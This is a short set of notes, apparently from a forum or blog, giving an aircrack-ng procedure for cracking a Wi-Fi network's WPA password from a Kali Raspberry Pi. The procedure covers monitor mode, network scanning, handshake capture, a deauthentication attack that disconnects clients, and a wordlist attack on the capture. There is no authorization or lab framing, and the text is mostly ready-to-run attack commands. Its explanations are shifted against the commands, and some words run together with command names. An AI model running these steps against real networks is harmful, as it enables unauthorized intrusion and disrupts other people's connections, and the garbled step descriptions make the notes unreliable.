- Download kali for raspberry pi & flash the OS onto the SD card
iw phy phy0 interface add mon0 type monitor
ifconfig mon0 up
*alternatively try: airmon-ng start wlan0
You may or may not have to do this
airmon-ng check kill
This will show your wireless cards such as mon0airmon-ng
This will scan for wireless networks in the areaairodump-ng mon0
This will attept to get a handshake from a selected wifi networkairodump-ng -c [channel] --bssid [bssid of wifi] -w temp/someOutputFile mon0
In a separate terminal, do this at the same time. Do this until you get a handshakeaireplay-ng –0 10 -a [bssid of wifi] mon0
In another separate terminal, this will disconnect clients from that wifi. This will take a whileaircrack-ng -b [bssid of wifi] -w [path to word dictionary] [path to capture packets .cap file]
In another terminal this will go through a lot of passwords and crack the captured handshake
See https://www.novaspirit.com/2018/04/24/kali-linux-raspberry-pi-3b-monitor-mode/
Nice tutorial ;)
Use to learn this using backtracking/Kali Linux, [this is a nice script] that have some useful tricks